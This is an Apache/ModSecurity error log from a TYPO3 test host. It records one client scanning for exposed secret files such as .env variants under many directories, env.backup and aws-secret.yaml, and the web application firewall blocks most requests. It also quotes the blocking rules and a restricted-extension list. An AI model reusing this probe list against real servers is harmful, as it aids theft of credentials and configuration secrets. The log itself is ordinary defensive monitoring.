[Thu Dec 18 03:27:40.280606 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDQAAAAI"]
[Thu Dec 18 03:27:40.280778 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDQAAAAI"]
[Thu Dec 18 03:27:40.310118 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDgAAAAI"]
[Thu Dec 18 03:27:40.310446 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDgAAAAI"]
[Thu Dec 18 03:27:40.310700 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDgAAAAI"]
[Thu Dec 18 03:27:40.333555 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDwAAAAI"]
[Thu Dec 18 03:27:40.333756 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDwAAAAI"]
[Thu Dec 18 03:27:40.333936 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aUNmnEBkfFvq8O6HEbsoDwAAAAI"]
[Thu Dec 18 03:27:40.356658 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNmnEBkfFvq8O6HEbsoEAAAAAI"]
[Thu Dec 18 03:27:40.356839 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNmnEBkfFvq8O6HEbsoEAAAAAI"]
[Thu Dec 18 03:27:40.357007 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aUNmnEBkfFvq8O6HEbsoEAAAAAI"]
[Thu Dec 18 03:27:40.391539 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNmnEBkfFvq8O6HEbsoEQAAAAI"]
[Thu Dec 18 03:27:40.391727 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNmnEBkfFvq8O6HEbsoEQAAAAI"]
[Thu Dec 18 03:27:40.391898 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUNmnEBkfFvq8O6HEbsoEQAAAAI"]
[Thu Dec 18 03:27:40.421112 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNmnEBkfFvq8O6HEbsoEgAAAAI"]
[Thu Dec 18 03:27:40.421301 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNmnEBkfFvq8O6HEbsoEgAAAAI"]
[Thu Dec 18 03:27:40.421447 2025] [:error] [pid 813018] [client 45.148.10.160:60130] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUNmnEBkfFvq8O6HEbsoEgAAAAI"]
[Thu Dec 18 03:27:43.647771 2025] [authz_core:error] [pid 813017] [client 45.148.10.160:53480] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Thu Dec 18 03:27:43.719393 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLigAAAAE"]
[Thu Dec 18 03:27:43.719608 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLigAAAAE"]
[Thu Dec 18 03:27:43.719818 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLigAAAAE"]
[Thu Dec 18 03:27:43.800578 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLiwAAAAE"]
[Thu Dec 18 03:27:43.800799 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLiwAAAAE"]
[Thu Dec 18 03:27:43.800988 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLiwAAAAE"]
[Thu Dec 18 03:27:43.866233 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjAAAAAE"]
[Thu Dec 18 03:27:43.866470 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjAAAAAE"]
[Thu Dec 18 03:27:43.866658 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjAAAAAE"]
[Thu Dec 18 03:27:43.938126 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjQAAAAE"]
[Thu Dec 18 03:27:43.938312 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjQAAAAE"]
[Thu Dec 18 03:27:43.938484 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUNmn2EDlGizgYLL-JCLjQAAAAE"]
[Thu Dec 18 03:27:44.002739 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjgAAAAE"]
[Thu Dec 18 03:27:44.002924 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjgAAAAE"]
[Thu Dec 18 03:27:44.003073 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjgAAAAE"]
[Thu Dec 18 03:27:44.064145 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjwAAAAE"]
[Thu Dec 18 03:27:44.064328 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjwAAAAE"]
[Thu Dec 18 03:27:44.064477 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLjwAAAAE"]
[Thu Dec 18 03:27:44.127351 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNmoGEDlGizgYLL-JCLkAAAAAE"]
[Thu Dec 18 03:27:44.127632 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNmoGEDlGizgYLL-JCLkAAAAAE"]
[Thu Dec 18 03:27:44.127848 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUNmoGEDlGizgYLL-JCLkAAAAAE"]
[Thu Dec 18 03:27:44.490133 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlQAAAAE"]
[Thu Dec 18 03:27:44.490335 2025] [:error] [pid 813017] [client 45.148.10.160:53480] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUNmoGEDlGizgYLL-JCLlQAAAAE"]
